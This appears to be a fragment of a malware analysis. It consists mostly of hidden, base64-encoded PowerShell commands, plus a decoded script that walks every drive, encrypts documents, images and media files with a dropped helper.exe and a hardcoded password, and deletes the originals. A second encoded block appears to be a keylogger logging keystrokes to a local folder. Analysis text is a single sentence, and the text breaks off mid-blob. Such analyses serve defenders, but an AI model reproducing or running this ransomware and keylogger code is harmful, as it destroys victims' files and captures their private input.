powershell -win hidden -enc JABwAGEAcwBzAD0AKAAnAEkAdwBCAEgAQQBHADgAQQBOAHcAQgBTAEEARABjAEEAYwBBAEIAbABBAEcAUQBBAFEAZwBCADUAQQBIAGMAQQBZAFEAQgA2AEEARwBrAEEAZQBBAEEAagBBAEEAPQA9ACcAKQANAAoAJABkAHIAaQB2AGUAcwAgAD0AIAA2ADUALgAuADkAMAAgAHwAIABmAG8AcgBlAGEAYwBoACAAewBbAGMAaABhAHIAXQAkAF8AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AagBwAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGoAcABlAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjAHgAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwB4ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABwAHQAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAZABmACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAHAANAAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AbQBwADMAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAG0AbwB2ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAGsAdgAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABuAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAcwB0ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAY...
The second encoded command uses the same encoding and hidden options and contains the following PowerShell instructions

$pass=('IwBHAG8ANwBSADcAcABlAGQAQgB5AHcAYQB6AGkAeAAjAA==')
$drives = 65..90 | foreach {[char]$_}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpeg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.docx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.doc")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xlsx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xls")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.ppt")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.pdf")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp4")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp3")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mov")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mkv")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
Invalid character in input stream.
 This set of commands encrypts several set of files and removes the original file. 



powershell -win hidden -enc IAAkAGwAbwBvAHQAIAA9ACAAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAIAArACAAIgBcAGQAeQBuAGEAXABsAG8AbwB0AFwASwBlAHkAbABvAGcAXAAiACkAOwAgAG0AZAAgACQAbABvAG8AdAAKAGYAdQBuAGMAdABpAG8AbgAgAEQAeQBuAEEAbQBpAHQAZQAtAEsAZQB5ACAAewAkAGQAYQB0AGUAYQBuAGQAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZAAtAEgASAAtAG0AbQA7ACAAJAB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIABIAEgALQBtAG0ACgBBAGQAZAAtAFQAeQBwAGUAIABAACIAIAAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7ACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABVAHMAZQByAFcAaQBuAGQAbwB3AHMAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIAAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AH0AIAAKACIAQAAKACAAIAAgACAAJABsAG8AZwBmAGkAbABlACAAPQAgACQAbABvAG8AdAAgACsAIAAiAGsAZQB5AGwAbwBnAF8AIgAgACsAIAAiACQAZABhAHQAZQBhAG4AZAB0AGkAbQBlACIAKwAgACIALgBsAG8AZwAiAAoAIAAgACAAIAAkAE0AQQBQAFYASwBfAFYASwBfAFQATwBfAFYAUwBDACAAPQAgADAAeAAwADAACgAJACQATQBBAFAAVgBLAF8AVgBTAEMAXwBUAE8AXwBWAEsAIAA9ACAAMAB4ADAAMQAKAAkAJABNAEEAUABWAEsAXwBWAEsAXwBUAE8AXwBDAEgAQQBSACAAPQAgADAAeAAwADIACgAJACQATQBBAFAAVgBLAF8AVgBTAEMAXwBUAE8AXwBWAEsAXwBFAFgAIAA9ACAAMAB4ADAAMwAKAAkAJABNAEEAUABWAEsAXwBWAEsAXwBUAE8AXwBWAFMAQwBfAEUAWAAgAD0AIAAwAHgAMAA0AAoACQAkAHYAaQByAHQAdQBhAGwAawBjAF8AcwBpAGcAIAA9ACAAQAAnAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8ALAAgAEUAeABhAGMAdABTAHAAZQBsAGwAaQBuAGcAPQB0AHIAdQBlACkAXQAgAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAcwBoAG8AcgB0ACAARwBlAHQAQQBzAHkAbgBjAEsAZQB5AFMAdABhAHQAZQAoAGkAbgB0ACAAdgBpAHIAdAB1AGEAbABLAGUAeQBDAG8AZABlACkAOwAgAAoAJwBAAAoACQAkAGsAYgBzAHQAYQB0AGUAXwBzAGkAZwAgAD0AIABAACcACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGsAZQB5AHMAdABhAHQAZQApADsACgAnAEAACgAJACQAbQBhAHAAYwBoAGEAcgBfAHMAaQBnACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAHUAaQBuAHQAIAB1AEMAbwBkAGUALAAgAGkAbgB0ACAAdQBNAGEAcABUAHkAcABlACkAOwAKACcAQAAKAAkAJAB0AG8AdQBuAGkAYwBvAGQAZQBfAHMAaQBnACAAPQAgAEAAJwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUAKAB1AGkAbgB0ACAAdwBWAGkAcgB0AEsAZQB5ACwAIAB1AGkAbgB0ACAAdwBTAGMAYQBuAEMAbwBkAGUALAAgAGIAeQB0AGUAWwBdACAAbABwAGsAZQB5AHMAdABhAHQAZQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAHAAdwBzAHoAQgB1AGYAZgAsACAAaQBuAHQAIABjAGMAaABCAHUAZgBmACwAIAB1AGkAbgB0ACAAdwBGAGwAYQBnAHMAKQA7AAoAJwBAAAoACQAkAGcAZQB0AEsAZQB5AFMAdABhAHQAZQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHYAaQByAHQAdQBhAGwAawBjAF8AcwBpAGcAIAAtAG4AYQBtAGUAIAAiAFcAaQBuADMAMgBHAGUAdABTAHQAYQB0AGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAJABnAGUAdABLAEIAUwB0AGEAdABlACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0ATQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAawBiAHMAdABhAHQAZQBfAHMAaQBnACAALQBuAGEAbQBlACAAIgBXAGkAbgAzADIATQB5AEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAJABnAGUAdABLAGUAeQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG0AYQBwAGMAaABhAHIAXwBzAGkAZwAgAC0AbgBhAG0AZQAgACIAVwBpAG4AMwAyAE0AeQBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAFQAaAByAHUACgAJACQAZwBlAHQAVQBuAGkAYwBvAGQAZQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQAbwB1AG4AaQBjAG8AZABlAF8AcwBpAGcAIAAtAG4AYQBtAGUAIAAiAFcAaQBuADMAMgBNAHkAVABvAFUAbgBpAGMAbwBkAGUAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAVABoAHIAdQAKAAkAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADQAMAAKACQAVABvAHAAVwBpAG4AZABvAHcAIAA9ACAAWwBVAHMAZQByAFcAaQBuAGQAbwB3AHMAXQA6ADoARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwAgACQAVwBpAG4AZABvAHcAVABpAHQAbABlACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUAIAAtAGUAcQAgACQAVABvAHAAVwBpAG4AZABvAHcAIAB9ACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAKACQAbABvAG8AdAAgAD0AIAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAgACsAIAAiAFwAZAB5AG4AYQBcAGwAbwBvAHQAXABLAGUAeQBsAG8AZwBcACIAKQA7ACAAbQBkACAAJABsAG8AbwB0AAkACQAKACQAZwBvAHQAaQB0ACAAPQAgACIAIgAKAAkACQBmAG8AcgAgACgAJABjAGgAYQByACAAPQAgADEAOwAgACQAYwBoAGEAcgAgAC0AbABlACAAMgA1ADQAOwAgACQAYwBoAGEAcgArACsAKQAgAHsAJAB2AGsAZQB5ACAAPQAgACQAYwBoAGEAcgAKAAkACQAJACQAZwBvAHQAaQB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAJAB2AGsAZQB5ACkACgAJAAkAaQBmACAAKAAkAGcAbwB0AGkAdAAgAC0AZQBxACAALQAzADIANwA2ADcAKQAgAHsAJABsAF8AcwBoAGkAZgB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAMQA2ADAAKQAKAAkACQAJAAkAJAByAF8AcwBoAGkAZgB0ACAAPQAgACQAZwBlAHQASwBlAHkAUwB0AGEAdABlADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAMQA2ADEAKQAKAAkACQAJAAkAJABjAGEAcABzAF8AbABvAGMAawAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrAAoACQAJAAkACQAkAHMAYwBhAG4AYwBvAGQAZQAgAD0AIAAkAGcAZQB0AEsAZQB5ADoAOgBNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAJAB2AGsAZQB5ACwAIAAkAE0AQQBQAFYASwBfAFYAUwBDAF8AVABPAF8AVgBLAF8ARQBYACkACgAJAAkACQAJACQAawBiAHMAdABhAHQAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAyADUANgAKAAkACQAJAAkAJABjAGgAZQBjAGsAawBiAHMAdABhAHQAZQAgAD0AIAAkAGcAZQB0AEsAQgBTAHQAYQB0AGUAOgA6AEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKAAkAGsAYgBzAHQAYQB0AGUAKQAKAAkACQAJAAkAJABtAHkAYwBoAGEAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUA